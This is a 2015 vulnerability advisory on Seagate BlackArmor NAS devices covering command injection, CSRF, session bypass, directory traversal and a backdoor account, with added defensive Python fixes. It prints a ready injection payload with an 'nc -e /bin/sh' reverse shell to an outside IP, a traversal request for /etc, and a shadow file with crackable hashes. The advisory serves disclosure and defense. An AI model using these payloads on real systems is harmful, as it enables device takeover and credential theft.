Wednesday, February 25, 2015

[Exploit] Seagate BlackArmor Network Storage System


Seagate BlackArmor Business Storage Network Storage System

Vulnerability: Command Injection
CVE: CVE-2014-2701

Description
The Seagate BlackArmor network storage system is susceptible to a root command injection vulnerability, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that, when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /index.php/mv_system/send_test_email
POST Data - email_recipients=%3Crecipients%3E%3Crecipient%3E%3Cemail%3E`nc 192.168.1.177 80 -e /bin/sh`%3C%2Femail%3E%3C%2Frecipient%3E%3C%2Frecipients%3E

Attack Requirements
- Authenticated session or valid user credentials (authentication can be bypassed due to broken session management).
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but due to broken session management, a remote adversary is able to call the “/index.php/mv_system/send_test_email” program without authentication. This ultimately results in an unauthenticated OS command injection attack, which is demonstrated in the stand-alone proof of concept exploit.

This exploit should work against other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.
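The following is an added example of the second recommendation applied to the request shown under Vulnerable Pages; it is not ISE's proof of concept and not Seagate's firmware code. It decodes the email_recipients XML that send_test_email accepts, allowlist-validates every <email> value, and builds the mail command as an argument list so no shell ever sees the address. The function names, the size cap and the sendmail path are assumptions; the two request bodies are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Conservative allowlist for one recipient address.  The first character must be
# alphanumeric so a value like "-bs" can never be read as an option by the mail
# program; backticks, "$", ";", "|" and whitespace are simply not in the classes.
EMAIL_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")
MAX_XML_BYTES = 4096  # assumed cap; a recipient list never needs more than this


def parse_recipients(form_body):
    """Decode a send_test_email POST body and return the text of every <email> node."""
    fields = parse_qs(form_body, strict_parsing=True)
    xml_text = fields.get("email_recipients", [""])[0]
    if len(xml_text) > MAX_XML_BYTES:
        raise ValueError("email_recipients too large")
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as err:
        raise ValueError("email_recipients is not well-formed XML: %s" % err)
    return [(node.text or "").strip() for node in root.iter("email")]


def is_valid_recipient(address):
    return EMAIL_RE.fullmatch(address) is not None


def validate_recipients(addresses):
    """Return the list unchanged if every address passes the allowlist; otherwise raise."""
    if not addresses:
        raise ValueError("no recipients supplied")
    rejected = [a for a in addresses if not is_valid_recipient(a)]
    if rejected:
        raise ValueError("rejected recipient(s): %r" % rejected)
    return addresses


def build_mail_argv(addresses, sendmail="/usr/sbin/sendmail"):
    """argv for subprocess.run(argv) with the default shell=False: each address is
    a separate argument, so nothing inside it is ever interpreted by a shell."""
    return [sendmail, "-i"] + list(addresses)


def handle_send_test_email(form_body):
    """Raw POST body -> safe argv, or ValueError for anything off the allowlist."""
    return build_mail_argv(validate_recipients(parse_recipients(form_body)))


def request_is_safe(form_body):
    try:
        handle_send_test_email(form_body)
        return True
    except ValueError:
        return False


# Constructed sample bodies (not captured from a device): a legitimate request and
# one that smuggles a command substitution into the address field.
GOOD_BODY = ("email_recipients=%3Crecipients%3E%3Crecipient%3E%3Cemail%3E"
             "ops%40example.com%3C%2Femail%3E%3C%2Frecipient%3E%3C%2Frecipients%3E")
BAD_BODY = ("email_recipients=%3Crecipients%3E%3Crecipient%3E%3Cemail%3E"
            "%60id%60%40example.com%3C%2Femail%3E%3C%2Frecipient%3E%3C%2Frecipients%3E")

if __name__ == "__main__":
    print(handle_send_test_email(GOOD_BODY))
    print("hostile body accepted:", request_is_safe(BAD_BODY))
```

The allowlist does the real work: the argv form stops the shell from interpreting backticks, but the leading-character rule also stops an address from being parsed as an option by the mail program itself, which a pure "no shell" fix would miss.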

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/seagate_root_cmd_inject.py




Vulnerability: Cross-Site Request Forgery
CVE: Pending

Description
The Seagate BlackArmor is susceptible to several Cross-Site Request Forgery attacks, which allow an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP request.

Details
All HTML forms served by the Seagate BlackArmor are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker can launch an attack capable of compromising the affected system.

Vendor Recommendations
- Cross-Site Request Forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contain a unique token.
- In addition to HTML form tokens, HTTP referrer checking should be enabled.
- Require users to re-authenticate before performing an application state change.
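An added example of the first two recommendations (per-session, per-form tokens plus an Origin/Referer check), written for this page and not taken from ISE or Seagate. The token is a random nonce bound by an HMAC to the session and the form name, so a value captured from one form or one user verifies for nothing else; the server secret, the allowed origin and the function names are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Per-deployment secret (assumption: generated at first boot and kept where the
# web user cannot read it).  A fresh random value keeps the example self-contained.
SERVER_SECRET = secrets.token_bytes(32)

# Constructed origin of the management interface; a device would derive this
# from its configured hostname and scheme.
ALLOWED_ORIGIN = "https://blackarmor.example.internal"


def _mac(session_id, form_name, nonce):
    msg = "|".join((session_id, form_name, nonce)).encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_form_token(session_id, form_name):
    """Token embedded in one form: <nonce>.<HMAC(secret, session|form|nonce)>."""
    nonce = secrets.token_hex(16)
    return nonce + "." + _mac(session_id, form_name, nonce)


def verify_form_token(token, session_id, form_name):
    """Recompute the MAC for this session and form; constant-time compare."""
    nonce, sep, mac = token.partition(".")
    if not sep or len(nonce) != 32:
        return False
    return hmac.compare_digest(mac, _mac(session_id, form_name, nonce))


def origin_allowed(headers):
    """Second, independent check: Origin (or Referer as a fallback) must name the UI itself.
    Only scheme and host are compared, so a hostile URL that merely contains
    the management hostname in its path or query is rejected."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return parts.scheme + "://" + parts.netloc == ALLOWED_ORIGIN


def accept_state_change(headers, form, session_id, form_name):
    """Both checks must pass before a state-changing request is acted on."""
    token = form.get("csrf_token", "")
    return origin_allowed(headers) and verify_form_token(token, session_id, form_name)


if __name__ == "__main__":
    tok = issue_form_token("demo-session", "send_test_email")
    print(accept_state_change({"Origin": ALLOWED_ORIGIN}, {"csrf_token": tok},
                              "demo-session", "send_test_email"))
```

The token is stateless (nothing is stored per request), which suits a small embedded web server; the third recommendation, re-authentication before sensitive changes, sits in front of accept_state_change and is not shown here.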

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass/Broken Session Management)
CVE: Pending

Description
The Seagate BlackArmor network storage system is susceptible to Missing Function Level Access Control (authentication bypass due to broken session management) attacks, which ultimately allow an attacker to arbitrarily call system functionality without first authenticating with the system.

Seagate session cookies are generated using user information and then encrypted. The resulting value is then used to keep track of a particular individual's application state. This cookie can be configured with an infinite expiration time, which results in generated cookies lasting forever. To demonstrate this issue, ISE used a permanently authenticated session cookie in conjunction with CVE-2014-2701 to execute operating system commands.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.
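An added example of the recommended design, not ISE's or Seagate's code: a server-side session table keyed by a value drawn from the OS CSPRNG, with idle and absolute expiry, in contrast to the encrypted-user-data cookie with optional infinite lifetime described above. The timeout values, the class and cookie name, and the injectable clock are assumptions made for the example.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60          # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 60 * 60  # hard ceiling regardless of activity


class SessionStore:
    """Server-side session table keyed by an unguessable identifier."""

    def __init__(self, clock=time.time):
        self._clock = clock      # injectable so expiry can be exercised without waiting
        self._sessions = {}

    def create(self, username):
        # 32 bytes from the OS CSPRNG: the cookie value is pure randomness and
        # carries nothing about the user to decrypt or reconstruct.  Two logins
        # by the same user get unrelated identifiers.
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = {"user": username, "created": now, "last_seen": now}
        return sid

    def lookup(self, sid):
        """Return the user for a live session, or None (and forget it) if expired or unknown."""
        record = self._sessions.get(sid)
        if record is None:
            return None
        now = self._clock()
        if (now - record["created"] > ABSOLUTE_TIMEOUT
                or now - record["last_seen"] > IDLE_TIMEOUT):
            del self._sessions[sid]
            return None
        record["last_seen"] = now
        return record["user"]

    def destroy(self, sid):
        """Logout: a captured identifier is worthless once the server forgets it."""
        self._sessions.pop(sid, None)

    def live_count(self):
        return len(self._sessions)


def set_cookie_header(sid):
    """Cookie attributes to send with the identifier; Max-Age matches the absolute ceiling."""
    return ("session=%s; Path=/; HttpOnly; Secure; SameSite=Strict; Max-Age=%d"
            % (sid, ABSOLUTE_TIMEOUT))


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("admin")
    print(set_cookie_header(sid))
    print(store.lookup(sid), store.live_count())
```

Because validity lives in the server table rather than in the cookie's contents, expiry and logout are enforced by the device even if a client keeps presenting an old value, which is exactly what the permanently valid cookie above fails to do.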

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- This vulnerability is demonstrated in conjunction with CVE-2014-2701.




Vulnerability: Directory Traversal
CVE: CVE-2014-2702

Description
The Seagate BlackArmor network storage system is susceptible to Directory Traversal attacks, which ultimately allow an attacker to access protected system locations.

Attack Requirements
- Authenticated session or valid user credentials (Authentication Bypass/Broken Session Management)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access protected data, which could lead to elevated privileges.

Vendor Recommendations
- Developers should refrain from using user-supplied input in calls to the file system.
- Developers should perform path canonicalization.
- Properly configure network services.
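An added example of the path canonicalization recommendation, written for this page and not drawn from ISE's proof of concept or Seagate's code: a handler for a get_backup_from_location-style "path" field that canonicalizes the request against a fixed backup root and refuses anything that resolves outside it, including absolute paths, ".." segments and symlinks. The backup root layout, the function names and the probe strings other than "/etc" are constructed for the example.

```python
import os
import tempfile


def resolve_under_root(root, user_path):
    """Canonicalize root + user_path and refuse anything that lands outside root.

    realpath() collapses '..' segments and follows symlinks, so the containment
    check sees the path the kernel would actually open, not the string the client
    sent.  An absolute user_path makes os.path.join discard root entirely, and the
    same containment check rejects that case too."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError("path escapes the backup root: %r" % user_path)
    return candidate


def list_backup_location(root, user_path):
    """What a safe directory-listing handler would do with the client's 'path' field."""
    return sorted(os.listdir(resolve_under_root(root, user_path)))


def demo():
    """Build a throwaway backup root, try each probe, and return {probe: outcome}."""
    outcomes = {}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "share1", "backups"))
        open(os.path.join(root, "share1", "backups", "nas.tar"), "w").close()
        # A symlink inside the root that points at "/" models a share that was
        # linked to the system disk; realpath() exposes where it really leads.
        try:
            os.symlink("/", os.path.join(root, "escape"))
            have_symlink = True
        except OSError:
            have_symlink = False

        outcomes["share1/backups"] = list_backup_location(root, "share1/backups")
        probes = ["/etc", "../../etc", "share1/../../etc"]
        if have_symlink:
            probes.append("escape/etc")
        for probe in probes:
            try:
                list_backup_location(root, probe)
                outcomes[probe] = "allowed"
            except PermissionError:
                outcomes[probe] = "rejected"
    return outcomes


if __name__ == "__main__":
    for probe, outcome in demo().items():
        print("%-20s %s" % (probe, outcome))
```

The check compares canonical paths, not strings: stripping "../" from the input would still let an absolute path or a symlink through, whereas commonpath on the resolved result rejects every route out of the root the same way.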

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “/index.php/mv_backup/get_backup_from_location” require authentication. An attacker can circumvent this by utilizing methods described by Missing Function Level Access Control (Authentication Bypass/Broken Session Management).


—Directory Listing—

POST /index.php/mv_backup/get_backup_from_location
POST Data - task_type=nas_nas&path=%2Fetc&test_connection=+





Vulnerability: Undocumented System User (Backdoor User)
CVE: Pending

Description
The Seagate BlackArmor network storage system contains an undocumented system user. This user's password is the only Seagate system user password that is protected by the insecure decrypt algorithm.

Details
- This user should be present in other Seagate Network Storage Systems.
- This user can be used to access the Seagate network storage system.

Impact
- Unknown - An attacker could gain system access by leveraging undocumented user accounts.

Vendor Recommendations
- Remove undocumented user accounts.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept

cat /etc/shadow

root:aL86k2VEuV4cY:16378:0:99999:7:::
devuser:x:16378:0:99999:7:::
avahi-autoipd:!:16378:0:99999:7:::
ftp:!:16378:0:99999:7:::
w41t980ck4pu63r:CsRCvByKdCO.c:16378:0:99999:7:::
admin:F1PYtWpQ/pGGY:16378:0:99999:7:::
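As an added example of how a defender would audit a firmware image for the condition described in this section (it is not ISE's or Seagate's code), the following parses the /etc/shadow lines quoted above, flags any account that is not on a documented allowlist, and separately flags any hash in the 13-character traditional DES crypt format. The allowlist of expected accounts is an assumption made for the example; the shadow lines are the ones shown in the proof of concept.

```python
# Shadow lines exactly as quoted in the proof of concept above.
SHADOW_SAMPLE = """root:aL86k2VEuV4cY:16378:0:99999:7:::
devuser:x:16378:0:99999:7:::
avahi-autoipd:!:16378:0:99999:7:::
ftp:!:16378:0:99999:7:::
w41t980ck4pu63r:CsRCvByKdCO.c:16378:0:99999:7:::
admin:F1PYtWpQ/pGGY:16378:0:99999:7:::
"""

# Assumed allowlist: the accounts a reviewer expects to find documented for the device.
KNOWN_ACCOUNTS = {"root", "admin", "devuser", "avahi-autoipd", "ftp"}


def classify_hash(field):
    """Name the password-hash format of one shadow password field."""
    if field in ("", "x"):
        return "no-hash"
    if field.startswith(("!", "*")):
        return "locked"
    if field.startswith("$"):
        return "crypt-" + field.split("$")[1]   # e.g. crypt-6 for sha512crypt
    if len(field) == 13:
        return "des-crypt"                      # traditional crypt(3): 2-char salt + 11 chars
    return "unknown"


def parse_shadow(text):
    """Yield (account, password_field) pairs, skipping blank and comment lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        entries.append((fields[0], fields[1]))
    return entries


def audit_shadow(text, known_accounts):
    """Return (account, finding, hash_kind) for undocumented accounts and weak hashes."""
    findings = []
    for name, hash_field in parse_shadow(text):
        kind = classify_hash(hash_field)
        if name not in known_accounts:
            findings.append((name, "undocumented-account", kind))
        elif kind == "des-crypt":
            findings.append((name, "weak-hash", kind))
    return findings


if __name__ == "__main__":
    for finding in audit_shadow(SHADOW_SAMPLE, KNOWN_ACCOUNTS):
        print("%-18s %-22s %s" % finding)
```

Run against an extracted firmware root, the same audit answers the two questions this section raises: which accounts exist that the documentation never mentions, and which of them can log in with a password hashed by an algorithm that offers little resistance to offline guessing.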






Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure - 2/25/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators
